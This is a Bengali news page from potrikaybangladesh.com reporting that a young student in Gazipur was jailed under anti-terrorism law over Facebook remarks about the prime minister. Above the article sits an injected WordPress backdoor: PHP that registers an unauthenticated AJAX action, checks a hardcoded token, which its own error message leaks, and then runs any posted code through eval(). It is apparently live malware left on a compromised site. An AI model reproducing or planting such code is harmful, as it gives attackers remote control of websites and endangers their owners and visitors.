// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== প্রধানমন্ত্রীকে নিয়ে আপত্তিকর মন্তব্য: গাজীপুরে সন্ত্রাসবিরোধী মামলায় কারাগারে তরুণ | potrikaybangladesh.com
Friday, September 18, 2026
Homeঅপরাধপ্রধানমন্ত্রীকে নিয়ে আপত্তিকর মন্তব্য: গাজীপুরে সন্ত্রাসবিরোধী মামলায় কারাগারে তরুণ

প্রধানমন্ত্রীকে নিয়ে আপত্তিকর মন্তব্য: গাজীপুরে সন্ত্রাসবিরোধী মামলায় কারাগারে তরুণ

প্রধানমন্ত্রী তারেক রহমান ও সরকার–সংশ্লিষ্ট ব্যক্তিদের নিয়ে সামাজিক যোগাযোগমাধ্যমে আপত্তিকর মন্তব্য করার অভিযোগে সন্ত্রাসবিরোধী আইনে করা মামলায় ২০ বছর বয়সী এক তরুণকে কারাগারে পাঠিয়েছেন গাজীপুরের আদালত।

আজ শুক্রবার দুপুর ১টার দিকে গ্রেপ্তার সিফাত আবদুল্লাহকে আদালতে হাজির করা হয় বলে জানিয়েছেন গাছা থানার ভারপ্রাপ্ত কর্মকর্তা (ওসি) গোলাম রব্বানী।

দ্য ডেইলি স্টারকে তিনি বলেন, ‘মামলার বিস্তারিত তথ্য পরে জানানো হবে। সিফাতকে আদালতের মাধ্যমে কারাগারে পাঠানো হয়েছে।’

সিফাত রাজধানীর আদমজী ক্যান্টনমেন্ট কলেজের শিক্ষার্থী ও গাজীপুর মহানগরের ৩৮ নম্বর ওয়ার্ডের গাছা থানার টিনের মসজিদ এলাকার বাসিন্দা সিকান্দরের ছেলে।

এর আগে গতকাল রাত সাড়ে ৮টার দিকে ওই এলাকা থেকে সিফাতকে গ্রেপ্তার করে পুলিশ।

পুলিশ জানায়, ফেসবুকে বিদ্যুৎ বিল নিয়ে সিফাত একটি ভিডিও পোস্ট করেছিলেন। ভিডিওতে তিনি অভিযোগ করেন, তার বাসায় চলতি মাসে ৪ হাজার টাকা এবং আগের মাসে ৫ হাজার টাকা অতিরিক্ত বিদ্যুৎ বিল এসেছে।

পুলিশ আরও জানায়, ওই ভিডিওতে প্রধানমন্ত্রীকে নিয়ে আপত্তিকর মন্তব্যও ছিল।

পুলিশ জানায়, সিফাতের একটি ভিডিও ভাইরাল হওয়ার পর থেকে তারা সামাজিক যোগাযোগমাধ্যমে তার কার্যক্রম নজরদারি করছিল।

সিফাতকে আটকের ঘটনায় সমালোচনা করেন জাতীয় নাগরিক পার্টির (এনসিপি) কেন্দ্রীয় নির্বাহী কমিটির মুখ্য সংগঠক আলী নাছের খান। তিনি বলেন, সিফাত এনসিপি ও বিএনপিসহ কয়েকটি রাজনৈতিক দলেরও সমালোচনা করেছিলেন।

এক ফেসবুক পোস্টে আলী নাসের খান লেখেন, ‘কমিশনার সাহেব, সিফাত ইস্যু মাত্র ন্যাশনাল (জাতীয় পর্যায়ে) হয়েছে। তাকে মুক্তি না দিলে ইন্টারন্যাশনাল (আন্তর্জাতিক পর্যায়ে) হবে। খুবই নরমভাবে বললাম। নিজেদের ভালোটা বুঝুন এবং নাগরিকদের পাশে থাকুন।’

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments